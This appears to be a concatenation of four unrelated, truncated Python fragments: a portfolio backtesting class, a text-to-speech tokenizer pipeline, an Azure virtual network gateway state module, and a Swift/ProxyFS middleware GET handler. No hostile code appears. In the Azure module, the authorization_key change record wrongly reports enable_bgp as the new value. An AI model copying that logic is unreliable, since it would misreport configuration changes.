'showline':True, 'linecolor': 'gray',
'zeroline':True, 'zerolinewidth':1 , 'zerolinecolor':'whitesmoke',
'showgrid': True, 'gridcolor': 'whitesmoke',
},
yaxis= {'anchor': 'x1', 'title': '', 'hoverformat':'.1f', 'tickformat':'.0f',
'showline':True, 'linecolor':'gray',
'zeroline':True, 'zerolinewidth':1 , 'zerolinecolor':'whitesmoke',
'showgrid': True, 'gridcolor': 'whitesmoke'
},
updatemenus= [dict(type='buttons',
active=-1, showactive = True,
direction='down',
y=0.5, x=1.1,
pad = {'l':0, 'r':0, 't':0, 'b':0},
buttons=[])],
annotations=[],))
# Save template
pio.templates['multi_strat'] = pio.to_templated(fig).layout.template
return
# %% CLASS PROPERTIES
# Portfolio or Strategy Returns - should be a pd.DataFrame
@property
def portrtns(self): return self.__portrtns
@portrtns.getter
def portrtns(self): return self.__portrtns
@portrtns.setter
def portrtns(self, x):
if isinstance(x, pd.Series):
self.__portrtns = x.to_frame()
elif isinstance(x, pd.DataFrame):
self.__portrtns = x
else:
raise ValueError('portrtns must be a pandas df or series: {} given'
.format(type(x)))
# Benchmark Returns - should be a pd.DataFrame
@property
def bmkrtns(self): return self.__bmkrtns
@bmkrtns.getter
def bmkrtns(self): return self.__bmkrtns
@bmkrtns.setter
def bmkrtns(self, x):
if isinstance(x, pd.Series):
self.__bmkrtns = x.to_frame()
elif isinstance(x, pd.DataFrame):
self.__bmkrtns = x
else:
raise ValueError('bmkrtns must be a pandas df or series: {} given'
.format(type(x)))
# %% BIG BANG
def big_bang(self, title=""):
""" End-to-End Control Function """
# Run Basic Backtest
self.run_backtest()
# Generate Plots
self.plot_master()
# Generate Markdown
md = self.markdown_doc(title=title)
self.md = md
return md
# %% HELPER FUNCTIONS
def _eom(self, x):
""" Trivial function to ensure End-of-Month Dates in Pandas """
x.index = x.index + pd.offsets.MonthEnd(0)
return x
# %% BASIC BACKTESTING
def run_backtest(self):
""" MAIN FUNCTION
Function will splice port returns with benchmark & Rf returns so we have
a common time history, then do a series of things:
- Cumulative Returns
- Excess Returns (to benchmark)
- Drawdown and Excess Drawdown
- Rolling 12m metrics
- Summary Table - Full Sample Period
- Summary Table - per_annum except most recent year which is YTD
- Build "wide" correlation matrix with port rtns, xs returns and
all benchmarks specified in self.bmkrtns
INPUTS not required but the following must have been set:
- self.portrtns
- self.bmkrtns
- self.benchmark
- self.Rf
"""
# Benchamrk
# Pull from bmkrtns if provided
# Pull from bmkrtns if index provided; set as vector of 0 otherwise
if self.Rb == None:
bmk = pd.Series(data=0, index=self.portrtns.index, name='BMK')
else:
bmk = self.bmkrtns.loc[:,self.Rb]
bmk.name = 'BMK'
# Risk Free Rate Stuff
# Pull from bmkrtns if index provided; set as vector of 0 otherwise
# Be careful about the alignment of dates (indices)
if self.Rf == None:
Rf = pd.Series(data=0, index=self.portrtns.index, name='Rf')
else:
Rf = self.bmkrtns.loc[:, self.Rf]
Rf.name = 'Rf'
# Consolidated dataframe for risk-free, benchmarks & returns
# Also set up cumulative returns
# Rf always at 0, Benchmark always at 1 in dataframe
self.rtns = pd.concat([Rf, bmk, self.portrtns], axis=1).dropna()
cr = (1 + self.rtns).cumprod() * 100 # cumulative returns
self.cum_rtn = cr
# Excess Returns
# Remember again Rb at 1
self.xsrtns = self.rtns.subtract(self.rtns.iloc[:, 1], axis='rows')
self.cum_xs_rtn = cr.subtract(cr.iloc[:,1], axis='rows') + 100
# drawdown analysis
self.drawdown = self.rtns2drawdown(alpha=False)
self.xs_drawdown = self.rtns2drawdown(alpha=True)
self.drawdown_table = self.drawdown_breakdown(alpha=False)
self.xs_drawdown_table = self.drawdown_breakdown(alpha=True)
# rolling period analysis
for t in [12]:
# 12m returns for data & risk free index
irtn = cr.pct_change(t)
# excess return taken by subtracting the benchmark
irtn_xs = irtn.subtract(irtn.iloc[:, 1], axis='rows')
# rolling volatility
iVol = self.rtns.rolling(window=t).std() * np.sqrt(self.freq)
# Ex-Post Tracking Error [std(Rp-Rb)]
iTE = self.xsrtns.rolling(t).std() * np.sqrt(self.freq)
# Sharpe Ratio [(Rp-Rb)/vol]
# Remember Rf at position 0
iSharpe = irtn.subtract(irtn.iloc[:, 0], axis='rows').divide(iVol, axis='rows')
# save ith data to dictionary
self.rolling[t] = dict(vol=iVol,
rtn=irtn,
xsrtn=irtn_xs,
te=iTE,
sharpe=iSharpe)
# Run summary table & annualised summary and ingest
self.summary = self.backtest_summary()
self.summary_pa = self.per_annum()
# Extended Correlation Matrix
# Use BMK, PORT, PORT_XS_RTNS & the bmkrtns indices to form corr matrix
# Some minor adjustments to remove Rf from 1st column
rtns_wide = pd.concat([self.rtns.iloc[:,1:], self.xsrtns.iloc[:, 2:]], axis=1)
rtns_wide.columns = list(self.xsrtns.columns)[1:] + list(self.xsrtns.columns + '_XS')[2:]
rtns_wide = pd.concat([rtns_wide, self.bmkrtns], axis=1).dropna()
self.rtns_wide = rtns_wide
self.corr = rtns_wide.corr()
return
def rtns2drawdown(self, alpha=True):
""" Returns-to-Drawdown Timeseries
NB/ Rebased to 0 not 100
"""
# Need to select a method for drawdown
# if alpha is True use excess returns, otherwise returns
# Remove risk free column
rtns = self.xsrtns if alpha else self.rtns
rtns = rtns.iloc[:,1:]
dd = 1 + rtns # add 1 to monthly rtns
dd.iloc[0,:] = 100 # rebase to 100
# iterate through each time period
# create an index series with a max of 100
for i, d in enumerate(dd.index):
# ignore 0th because we need the i-1 time period
if i == 0:
continue
| |
rest of word
parts = list(
filter(
None,
settings.begin_punctuations_pattern.split(word_text, maxsplit=1),
)
)
first_word = True
while word_text and (len(parts) == 2):
punct_text, word_text = parts
if first_word:
# Preserve leadingwhitespace
punct_text = first_ws + punct_text
first_word = False
punct_text_norm = settings.normalize_whitespace(punct_text)
has_punctuation = True
yield PunctuationWordNode, {
"text": punct_text_norm,
"text_with_ws": punct_text,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
}
parts = list(
filter(
None,
settings.begin_punctuations_pattern.split(
word_text, maxsplit=1
),
)
)
# Punctuations at the end of the word
end_punctuations: typing.List[str] = []
if settings.end_punctuations_pattern is not None:
# Split into rest of word and end punctuation
parts = list(
filter(
None, settings.end_punctuations_pattern.split(word_text, maxsplit=1)
)
)
while word_text and (len(parts) == 2):
word_text, punct_text = parts
has_punctuation = True
end_punctuations.append(punct_text)
parts = list(
filter(
None,
settings.end_punctuations_pattern.split(word_text, maxsplit=1),
)
)
if not has_punctuation:
# Leave word as-is
return
if settings.keep_whitespace and (not end_punctuations):
# Preserve trailing whitespace
word_text = word_text + last_ws
word_text_norm = settings.normalize_whitespace(word_text)
if word_text:
yield WordNode, {
"text": word_text_norm,
"text_with_ws": word_text,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
"in_lexicon": self._is_word_in_lexicon(word_text_norm, settings),
}
last_punct_idx = len(end_punctuations) - 1
for punct_idx, punct_text in enumerate(reversed(end_punctuations)):
if settings.keep_whitespace and (punct_idx == last_punct_idx):
# Preserve trailing whitespace
punct_text += last_ws
yield PunctuationWordNode, {
"text": punct_text.strip(),
"text_with_ws": punct_text,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
}
def _split_major_breaks(self, graph: GraphType, node: Node):
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if settings.major_breaks_pattern is None:
# No pattern set for this language
return
parts = settings.major_breaks_pattern.split(word.text_with_ws)
if len(parts) < 2:
return
word_part = parts[0]
break_part = parts[1]
if word_part.strip():
# Only yield word if there's anything but whitespace
word_part_norm = settings.normalize_whitespace(word_part)
yield WordNode, {
"text": word_part_norm,
"text_with_ws": word_part,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
"in_lexicon": self._is_word_in_lexicon(word_part_norm, settings),
}
else:
# Keep leading whitespace
break_part = word_part + break_part
yield BreakWordNode, {
"break_type": BreakType.MAJOR,
"text": settings.normalize_whitespace(break_part),
"text_with_ws": break_part,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
}
def _split_minor_breaks(self, graph: GraphType, node: Node):
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if settings.minor_breaks_pattern is None:
# No pattern set for this language
return
parts = settings.minor_breaks_pattern.split(word.text_with_ws)
if len(parts) < 2:
return
word_part = parts[0]
if word_part.strip():
# Only yield word if there's anything but whitespace
word_part_norm = settings.normalize_whitespace(word_part)
yield WordNode, {
"text": word_part_norm,
"text_with_ws": word_part,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
"in_lexicon": self._is_word_in_lexicon(word_part_norm, settings),
}
break_part = parts[1]
yield BreakWordNode, {
"break_type": BreakType.MINOR,
"text": settings.normalize_whitespace(break_part),
"text_with_ws": break_part,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
}
def _find_parent(self, graph, node, *classes):
"""Tries to find a node whose type is in classes in the tree above node"""
parents = []
for parent_node in graph.predecessors(node.node):
parent = graph.nodes[parent_node][DATA_PROP]
if isinstance(parent, classes):
return parent
parents.append(parent)
for parent in parents:
match = self._find_parent(graph, parent, classes)
if match is not None:
return match
return None
# pylint: disable=no-self-use
def _phonemes_for_break(
self,
break_type: typing.Union[str, BreakType],
lang: typing.Optional[str] = None,
) -> typing.Optional[PHONEMES_TYPE]:
if break_type == BreakType.MAJOR:
return [IPA.BREAK_MAJOR.value]
if break_type == BreakType.MINOR:
return [IPA.BREAK_MINOR.value]
return None
# -------------------------------------------------------------------------
def _pipeline_tokenize(
self,
graph,
parent_node,
text,
word_phonemes: typing.Optional[typing.List[typing.List[str]]] = None,
scope_kwargs=None,
in_inline_lexicon: typing.Optional[
typing.Callable[[str, typing.Optional[str]], bool]
] = None,
):
"""Splits text into word nodes"""
if scope_kwargs is None:
scope_kwargs = {}
lang = self.default_lang
if scope_kwargs is not None:
lang = scope_kwargs.get("lang", lang)
settings = self.get_settings(lang)
assert settings is not None, f"No settings for {lang}"
if settings.pre_process_text is not None:
# Pre-process text
text = settings.pre_process_text(text)
# Split into separate words (preseving whitespace).
for word_text in settings.split_words(text):
word_text_norm = settings.normalize_whitespace(word_text)
if not word_text_norm:
continue
if not settings.keep_whitespace:
word_text = word_text_norm
word_kwargs = scope_kwargs
if word_phonemes:
word_kwargs = {**scope_kwargs, "phonemes": word_phonemes.pop()}
# Determine if word is in a lexicon.
# If so, it will not be interpreted as an initialism, split apart, etc.
in_lexicon: typing.Optional[bool] = None
if in_inline_lexicon is not None:
# Check inline <lexicon> first
in_lexicon = in_inline_lexicon(
word_text_norm, scope_kwargs.get("word_role")
)
if not in_lexicon:
# Check main language lexicon
in_lexicon = self._is_word_in_lexicon(word_text_norm, settings)
word_node = WordNode(
node=len(graph),
text=word_text_norm,
text_with_ws=word_text,
implicit=True,
in_lexicon=in_lexicon,
**word_kwargs,
)
graph.add_node(word_node.node, data=word_node)
graph.add_edge(parent_node.node, word_node.node)
# -------------------------------------------------------------------------
# Pipeline Splits
# -------------------------------------------------------------------------
def _split_spell_out(self, graph: GraphType, node: Node):
"""Expand spell-out (a-1 -> a dash one)"""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as != InterpretAs.SPELL_OUT:
return
settings = self.get_settings(word.lang)
# Preserve whitespace
first_ws, last_ws = settings.get_whitespace(word.text_with_ws)
last_char_idx = len(word.text) - 1
for i, c in enumerate(word.text):
# Look up in settings first ("." -> "dot")
word_text = settings.spell_out_words.get(c)
role = WordRole.DEFAULT
if word_text is None:
if c.isalpha():
# Assume this is a letter
word_text = c
role = WordRole.LETTER
else:
# Leave as is (expand later in pipeline if digit, etc.)
word_text = c
if not word_text:
continue
if settings.keep_whitespace:
if i == 0:
word_text = first_ws + word_text
if i == last_char_idx:
word_text += last_ws
else:
word_text += settings.join_str
yield WordNode, {
"text": settings.normalize_whitespace(word_text),
"text_with_ws": word_text,
"implicit": True,
"lang": word.lang,
"role": role,
}
def _split_replacements(self, graph: GraphType, node: Node):
"""Do regex replacements on word text"""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if not settings.replacements:
# No replacements
return
matched = False
new_text = word.text_with_ws
for pattern, template in settings.replacements:
assert isinstance(pattern, REGEX_PATTERN)
new_text, num_subs = pattern.subn(template, new_text)
if num_subs > 0:
matched = True
if matched:
# Tokenize new text (whitespace is preserved by regex)
for part_text in settings.split_words(new_text):
part_text_norm = settings.normalize_whitespace(part_text)
if not settings.keep_whitespace:
part_text = part_text_norm
if not part_text_norm:
# Ignore empty words
continue
yield WordNode, {
"text": part_text_norm,
"text_with_ws": part_text,
"implicit": True,
"lang": word.lang,
"in_lexicon": self._is_word_in_lexicon(part_text_norm, settings),
}
def _split_abbreviations(self, graph: GraphType, node: Node):
"""Expand abbreviations"""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if not settings.abbreviations:
# No abbreviations
return
new_text: typing.Optional[str] = None
for pattern, template in settings.abbreviations.items():
assert isinstance(pattern, REGEX_PATTERN), pattern
match = pattern.match(word.text_with_ws)
if match is not None:
new_text = match.expand(template)
break
if new_text is not None:
# Tokenize new text (whitespace should be preserved by regex)
for part_text in settings.split_words(new_text):
part_text_norm = settings.normalize_whitespace(part_text)
if not part_text_norm:
continue
if not settings.keep_whitespace:
part_text = part_text_norm
yield WordNode, {
"text": part_text_norm,
"text_with_ws": part_text,
"implicit": True,
"lang": word.lang,
"in_lexicon": self._is_word_in_lexicon(part_text_norm, settings),
}
def _split_initialism(self, graph: GraphType, node: Node):
"""Split apart ABC or A.B.C."""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon or (len(word.text) < 2):
# Don't interpret words that are spoken for or are too short
return
settings = self.get_settings(word.lang)
if (settings.is_initialism is None) or (settings.split_initialism is None):
# Can't do anything without these functions
return
if not settings.is_initialism(word.text):
# Not an initialism
return
first_ws, last_ws = settings.get_whitespace(word.text_with_ws)
parts = settings.split_initialism(word.text)
last_part_idx = len(parts) - 1
# Split according to language-specific function
for part_idx, part_text in enumerate(parts):
part_text_norm = settings.normalize_whitespace(part_text)
if not part_text_norm:
continue
if settings.keep_whitespace:
if part_idx == 0:
part_text = first_ws + part_text
if 0 <= part_idx < last_part_idx:
part_text += settings.join_str
elif part_idx == last_part_idx:
part_text += last_ws
yield WordNode, {
"text": part_text_norm,
"text_with_ws": part_text,
"implicit": True,
"lang": word.lang,
"role": WordRole.LETTER,
}
def _split_ignore_non_words(self, graph: GraphType, node: Node):
"""Mark non-words as ignored"""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if settings.is_non_word is None:
# No function for this language
return
if settings.is_non_word(word.text):
yield (IgnoreNode, {})
# -------------------------------------------------------------------------
# Pipeline Transformations
# -------------------------------------------------------------------------
def _transform_number(self, graph: GraphType, node: Node) -> bool:
if not isinstance(node, WordNode):
return False
word = typing.cast(WordNode, node)
if (not word.is_maybe_number) or (
word.interpret_as and (word.interpret_as != InterpretAs.NUMBER)
):
return False
| |
# -*- coding: utf-8 -*-
"""
Azure Resource Manager (ARM) Virtual Network Gateway State Module
.. versionadded:: 1.0.0
:maintainer: <<EMAIL>>
:configuration: This module requires Azure Resource Manager credentials to be passed via acct. Note that the
authentication parameters are case sensitive.
Required provider parameters:
if using username and password:
* ``subscription_id``
* ``username``
* ``password``
if using a service principal:
* ``subscription_id``
* ``tenant``
* ``client_id``
* ``secret``
Optional provider parameters:
**cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud. Possible values:
* ``AZURE_PUBLIC_CLOUD`` (default)
* ``AZURE_CHINA_CLOUD``
* ``AZURE_US_GOV_CLOUD``
* ``AZURE_GERMAN_CLOUD``
Example acct setup for Azure Resource Manager authentication:
.. code-block:: yaml
azurerm:
default:
subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617
tenant: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF
client_id: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF
secret: XXXXXXXXXXXXXXXXXXXXXXXX
cloud_environment: AZURE_PUBLIC_CLOUD
user_pass_auth:
subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617
username: fletch
password: <PASSWORD>
The authentication parameters can also be passed as a dictionary of keyword arguments to the ``connection_auth``
parameter of each state, but this is not preferred and could be deprecated in the future.
Example states using Azure Resource Manager authentication:
.. code-block:: jinja
Ensure virtual network exists:
azurerm.network.virtual_network.present:
- name: my_vnet
- resource_group: my_rg
- address_prefixes:
- '10.0.0.0/8'
- '192.168.0.0/16'
- dns_servers:
- '8.8.8.8'
- tags:
how_awesome: very
contact_name: <NAME>
- connection_auth: {{ profile }}
Ensure virtual network is absent:
azurerm.network.virtual_network.absent:
- name: other_vnet
- resource_group: my_rg
- connection_auth: {{ profile }}
"""
# Python libs
from __future__ import absolute_import
from dict_tools import differ
import logging
import re
log = logging.getLogger(__name__)
TREQ = {
"present": {
"require": [
"states.azurerm.resource.group.present",
"states.azurerm.network.virtual_network.present",
]
},
"connection_present": {
"require": [
"states.azurerm.resource.group.present",
"states.azurerm.network.virtual_network.present",
"states.azurerm.network.virtual_network_gateway.present",
]
},
}
async def connection_present(
hub,
ctx,
name,
resource_group,
virtual_network_gateway,
connection_type,
virtual_network_gateway2=None,
local_network_gateway2=None,
peer=None,
connection_protocol=None,
shared_key=None,
enable_bgp=None,
ipsec_policies=None,
use_policy_based_traffic_selectors=None,
routing_weight=None,
express_route_gateway_bypass=None,
authorization_key=None,
tags=None,
connection_auth=None,
**kwargs,
):
"""
.. versionadded:: 1.0.0
Ensure a virtual network gateway connection exists.
:param name:
The name of the virtual network gateway connection.
:param resource_group:
The name of the resource group associated with the virtual network gateway connection.
:param virtual_network_gateway:
The name of the virtual network gateway that will be the first endpoint of the connection.
The virtual_network_gateway is immutable once set.
:param connection_type:
Gateway connection type. Possible values include: 'IPsec', 'Vnet2Vnet', and 'ExpressRoute'.
The connection_type is immutable once set.
:param virtual_network_gateway2:
The valid Resource ID representing a VirtualNetworkGateway Object that will be used as the second endpoint
for the connection. Required for a connection_type of 'Vnet2Vnet'. This is immutable once set.
:param local_network_gateway2:
The valid Resource ID representing a LocalNetworkGateway Object that will be used as the second endpoint
for the connection. Required for a connection_type of 'IPSec'. This is immutable once set.
:param peer:
The valid Resource ID representing a ExpressRouteCircuit Object that will be used as the second endpoint
for the connection. Required for a connection_type of 'ExpressRoute'. This is immutable once set.
:param connection_protocol:
Connection protocol used for this connection. Possible values include: 'IKEv2', 'IKEv1'.
:param shared_key:
The shared key for the connection. Required for a connection_type of 'IPSec' or 'Vnet2Vnet'.
Defaults to a randomly generated key.
:param enable_bgp:
Whether BGP is enabled for this virtual network gateway connection or not. This is a bool value that defaults
to False. Both endpoints of the connection must have BGP enabled and may not have the same ASN values. Cannot
be enabled while use_policy_based_traffic_selectors is enabled.
:param ipsec_policies:
The IPSec Policies to be considered by this connection. Must be passed as a list containing a single IPSec
Policy dictionary that contains the following parameters:
- ``sa_life_time_seconds``: The IPSec Security Association (also called Quick Mode or Phase 2 SA)
lifetime in seconds for P2S client. Must be between 300 - 172799 seconds.
- ``sa_data_size_kilobytes``: The IPSec Security Association (also called Quick Mode or Phase 2 SA) payload
size in KB for P2S client. Must be between 1024 - 2147483647 kilobytes.
- ``ipsec_encryption``: The IPSec encryption algorithm (IKE phase 1). Possible values include: 'None',
'DES', 'DES3', 'AES128', 'AES192', 'AES256', 'GCMAES128', 'GCMAES192', 'GCMAES256'
- ``ipsec_integrity``: The IPSec integrity algorithm (IKE phase 1). Possible values include:
'MD5', 'SHA1', 'SHA256', 'GCMAES128', 'GCMAES192', 'GCMAES256'
- ``ike_encryption``: The IKE encryption algorithm (IKE phase 2). Possible values include:
'DES', 'DES3', 'AES128', 'AES192', 'AES256', 'GCMAES256', 'GCMAES128'
- ``ike_integrity``: The IKE integrity algorithm (IKE phase 2). Possible values include:
'MD5', 'SHA1', 'SHA256', 'SHA384', 'GCMAES256', 'GCMAES128'
- ``dh_group``: The DH Group used in IKE Phase 1 for initial SA. Possible values include:
'None', 'DHGroup1', 'DHGroup2', 'DHGroup14', 'DHGroup2048', 'ECP256', 'ECP384', 'DHGroup24'
- ``pfs_group``: The Pfs Group used in IKE Phase 2 for new child SA. Possible values include:
'None', 'PFS1', 'PFS2', 'PFS2048', 'ECP256', 'ECP384', 'PFS24', 'PFS14', 'PFSMM'
:param use_policy_based_traffic_selectors:
Enable policy-based traffic selectors for a connection. Can only be enabled for a connection of type 'IPSec'.
Cannot be enabled at the same time as BGP. Requires that the IPSec policies are defined. This is a bool value.
:param routing_weight:
The routing weight. This is an integer value.
:param express_route_gateway_bypass:
Bypass ExpressRoute Gateway for data forwarding. This is a bool value.
:param authorization_key:
The authorizationKey. This is a string value.
:param tags:
A dictionary of strings can be passed as tag metadata to the virtual network gateway connection object.
:param connection_auth:
A dict with subscription and authentication parameters to be used in connecting to the
Azure Resource Manager API.
Example usage:
.. code-block:: yaml
Ensure virtual network gateway Vnet2Vnet connection exists:
azurerm.network.virtual_network_gateway.connection_present:
- name: connection1
- resource_group: group1
- virtual_network_gateway: Resource ID for gateway1
- connection_type: 'Vnet2Vnet'
- virtual_network_gateway2: Resource ID for gateway2
- enable_bgp: False
- shared_key: 'key'
- tags:
contact_name: <NAME>
- connection_auth: {{ profile }}
Ensure virtual network gateway IPSec connection exists:
azurerm.network.virtual_network_gateway.connection_present:
- name: connection1
- resource_group: group1
- virtual_network_gateway: Resource ID for gateway1
- connection_type: 'IPSec'
- local_network_gateway2: Resource ID for gateway2
- enable_bgp: False
- shared_key: 'key'
- use_policy_based_traffic_selectors: True
- ipsec_policies:
- sa_life_time_seconds: 300
sa_data_size_kilobytes: 1024
ipsec_encryption: 'DES'
ipsec_integrity: 'SHA256'
ike_encryption: 'DES'
ike_integrity: 'SHA256'
dh_group: 'None'
pfs_group: 'None'
- tags:
contact_name: <NAME>
- connection_auth: {{ profile }}
"""
ret = {"name": name, "result": False, "comment": "", "changes": {}}
action = "create"
if not isinstance(connection_auth, dict):
if ctx["acct"]:
connection_auth = ctx["acct"]
else:
ret[
"comment"
] = "Connection information must be specified via acct or connection_auth dictionary!"
return ret
connection = await hub.exec.azurerm.network.virtual_network_gateway.connection_get(
ctx, name, resource_group, azurerm_log_level="info", **connection_auth
)
if "error" not in connection:
action = "update"
tag_changes = differ.deep_diff(connection.get("tags", {}), tags or {})
if tag_changes:
ret["changes"]["tags"] = tag_changes
if connection_protocol and connection_protocol != connection.get(
"connection_protocol"
):
ret["changes"]["connection_protocol"] = {
"old": connection.get("connection_protocol"),
"new": connection_protocol,
}
if connection_type == "IPSec":
if ipsec_policies:
if not isinstance(ipsec_policies, list):
ret[
"comment"
] = "ipsec_policies must be provided as a list containing a single dictionary!"
return ret
try:
policy = ipsec_policies[0]
except IndexError:
ret[
"comment"
] = "ipsec_policies must be provided as a list containing a single dictionary!"
return ret
if not isinstance(policy, dict):
ret[
"comment"
] = "ipsec_policies must be provided as a list containing a single dictionary!"
return ret
if len(connection.get("ipsec_policies", [])) == 1:
connection_policy = connection.get("ipsec_policies")[0]
for key in policy.keys():
if policy[key] != connection_policy.get(key):
ret["changes"]["ipsec_policies"] = {
"old": connection.get("ipsec_policies", []),
"new": ipsec_policies,
}
break
else:
ret["changes"]["ipsec_policies"] = {
"old": connection.get("ipsec_policies", []),
"new": ipsec_policies,
}
# Checking boolean parameter
if use_policy_based_traffic_selectors is not None:
if use_policy_based_traffic_selectors != connection.get(
"use_policy_based_traffic_selectors"
):
ret["changes"]["use_policy_based_traffic_selectors"] = {
"old": connection.get("use_policy_based_traffic_selectors"),
"new": use_policy_based_traffic_selectors,
}
if connection_type == "Vnet2Vnet" or connection_type == "IPSec":
# Checking boolean parameter
if enable_bgp is not None and enable_bgp != connection.get("enable_bgp"):
ret["changes"]["enable_bgp"] = {
"old": connection.get("enable_bgp"),
"new": enable_bgp,
}
if shared_key and shared_key != connection.get("shared_key"):
ret["changes"]["shared_key"] = {
"old": connection.get("shared_key"),
"new": shared_key,
}
if connection_type == "ExpressRoute":
if peer and peer != connection.get("peer"):
ret["changes"]["peer"] = {"old": connection.get("peer"), "new": peer}
if authorization_key and authorization_key != connection.get(
"authorization_key"
):
ret["changes"]["authorization_key"] = {
"old": connection.get("authorization_key"),
"new": enable_bgp,
}
if routing_weight is not None and routing_weight != connection.get(
"routing_weight"
):
ret["changes"]["routing_weight"] = {
"old": connection.get("routing_weight"),
"new": routing_weight,
}
# Checking boolean parameter
if express_route_gateway_bypass is not None:
if express_route_gateway_bypass != connection.get(
| |
path = urllib_parse.unquote(req.path)
new_metadata = extract_object_metadata_from_headers(req.headers)
try:
head_response = self.rpc_call(ctx, rpc.head_request(path))
raw_old_metadata, mtime, _, _, inode_number, _ = \
rpc.parse_head_response(head_response)
except utils.RpcError as err:
if err.errno in (pfs_errno.NotFoundError, pfs_errno.NotDirError):
return swob.HTTPNotFound(request=req)
else:
raise
# There is no need to call unmung_etags() before the merge and
# mung_etags() after because the merge cannot change the several
# possible ETag headers.
#
# This might be an opportunity to drop an ETAG header that has
# become stale due to num_writes changing, but that does not
# seem important to address.
old_metadata = deserialize_metadata(raw_old_metadata)
merged_metadata = merge_object_metadata(old_metadata, new_metadata)
raw_merged_metadata = serialize_metadata(merged_metadata)
self.rpc_call(ctx, rpc.post_request(
path, raw_old_metadata, raw_merged_metadata))
resp = swob.HTTPAccepted(request=req, body="")
return resp
def get_object(self, ctx):
req = ctx.req
byteranges = req.range.ranges if req.range else ()
try:
object_response = self.rpc_call(ctx, rpc.get_object_request(
urllib_parse.unquote(req.path), byteranges))
except utils.RpcError as err:
if err.errno in (pfs_errno.NotFoundError, pfs_errno.NotDirError):
return swob.HTTPNotFound(request=req)
elif err.errno == pfs_errno.IsDirError:
return swob.HTTPOk(
request=req, body="",
headers={"Content-Type": DIRECTORY_CONTENT_TYPE,
"ETag": EMPTY_OBJECT_ETAG})
else:
# punt to top-level exception handler
raise
(read_plan, raw_metadata, size, mtime_ns,
is_dir, ino, num_writes, lease_id) = \
rpc.parse_get_object_response(object_response)
metadata = deserialize_metadata(raw_metadata)
unmung_etags(metadata, num_writes)
headers = swob.HeaderKeyDict(metadata)
if "Content-Type" not in headers:
headers["Content-Type"] = guess_content_type(req.path, is_dir)
else:
headers['Content-Type'] = headers['Content-Type'].split(
';swift_bytes=')[0]
headers["Accept-Ranges"] = "bytes"
headers["Last-Modified"] = last_modified_from_epoch_ns(
mtime_ns)
headers["X-Timestamp"] = x_timestamp_from_epoch_ns(
mtime_ns)
headers["Etag"] = best_possible_etag(
headers, ctx.account_name, ino, num_writes, is_dir=is_dir)
get_read_plan = req.params.get("get-read-plan", "no")
if get_read_plan == "":
get_read_plan = "yes"
if self.bypass_mode != 'off' and req.environ.get('swift_owner') and \
config_true_value(get_read_plan):
headers.update({
# Flag that pfs_middleware correctly interpretted this request
"X-ProxyFS-Read-Plan": "True",
# Stash the "real" content type...
"X-Object-Content-Type": headers["Content-Type"],
# ... so we can indicate that *this* data is coming out JSON
"Content-Type": "application/json",
# Also include the total object size
# (since the read plan respects Range requests)
"X-Object-Content-Length": size,
})
return swob.HTTPOk(request=req, body=json.dumps(read_plan),
headers=headers)
if size > 0 and read_plan is None:
headers["Content-Range"] = "bytes */%d" % size
return swob.HTTPRequestedRangeNotSatisfiable(
request=req, headers=headers)
# NB: this is a size-0 queue, so it acts as a channel: a put()
# blocks until another greenthread does a get(). This lets us use it
# for (very limited) bidirectional communication.
channel = eventlet.queue.Queue(0)
eventlet.spawn_n(self._keep_lease_alive, ctx, channel, lease_id)
listing_iter = listing_iter_from_read_plan(read_plan)
# Make sure that nobody (like our __call__ method) messes with this
# environment once we've started. Otherwise, the auth callback may
# reappear, causing log-segment GET requests to fail. This may be
# seen with container ACLs; since the underlying container name
# differs from the user-presented one, without copying the
# environment, all object GET requests for objects in a public
# container would fail.
copied_req = swob.Request(req.environ.copy())
# Ideally we'd wrap seg_iter instead, but swob.Response relies on
# its app_iter supporting certain methods for conditional responses
# to work, and forwarding all those methods through the wrapper is
# prone to failure whenever a new method is added.
#
# Wrapping the listing iterator is just as good. After
# SegmentedIterable exhausts it, we can safely release the lease.
def done_with_object_get():
channel.put("you can stop now")
# It's not technically necessary for us to wait for the other
# greenthread here; we could use one-way notification. However,
# doing things this way lets us ensure that, once this function
# returns, there are no more background actions taken by the
# greenthread. This makes testing a lot easier; we can call the
# middleware, let it return, and then assert things. Were we to
# use a fire-and-forget style, we'd never be sure when all the
# RPCs had been called, and the tests would end up flaky.
channel.get()
wrapped_listing_iter = iterator_posthook(
listing_iter, done_with_object_get)
seg_iter = swift_code.SegmentedIterable(
copied_req, self.zero_filler_app, wrapped_listing_iter,
self.max_get_time,
self.logger, 'PFS', 'PFS',
name=req.path)
resp = swob.HTTPOk(app_iter=seg_iter, conditional_response=True,
request=req,
headers=headers,
content_length=size)
# Support conditional if-match/if-none-match requests for SLOs
resp._conditional_etag = swift_code.resolve_etag_is_at_header(
req, resp.headers)
return resp
def _keep_lease_alive(self, ctx, channel, lease_id):
keep_going = [True]
lease_error = [False]
def renew():
if lease_error[0]:
return
try:
self.rpc_call(ctx, rpc.renew_lease_request(lease_id))
except (utils.RpcError, utils.RpcTimeout):
